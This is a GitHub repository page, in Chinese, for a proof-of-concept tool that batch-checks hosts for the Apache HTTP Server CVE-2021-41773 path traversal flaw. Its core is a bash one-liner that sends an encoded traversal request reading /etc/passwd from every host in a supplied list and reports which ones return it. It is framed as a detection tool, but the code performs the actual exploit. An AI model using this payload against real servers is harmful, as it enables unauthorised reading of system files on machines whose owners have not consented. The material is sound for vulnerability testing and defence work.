ZephrFish/CVE-2021-41773-PoC
GitHub: ZephrFish/CVE-2021-41773-PoC
一个用于批量检测 Apache HTTP Server CVE-2021-41773 路径穿越漏洞的简易概念验证工具,支持从文件读取目标列表并逐一输出检测结果。
Stars: 17 | Forks: 11
# CVE-2021-41773 概念验证
用于检查主机是否存在 CVE-2021-41773 漏洞的简易快捷概念验证
```
python3 full.py hosts.txt
```
其中 hosts.txt 包含你的目标:
```
domain.com
blah.com
192.168.1.1
```
它将打印出该主机是否存在漏洞。
bash 的 Python 版本:
```
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
```
祝使用愉快!
标签:Apache HTTP Server, CISA项目, CVE-2021-41773, Maven, POC, Python, Web安全, 应用安全, 无后门, 漏洞验证, 蓝队分析, 逆向工具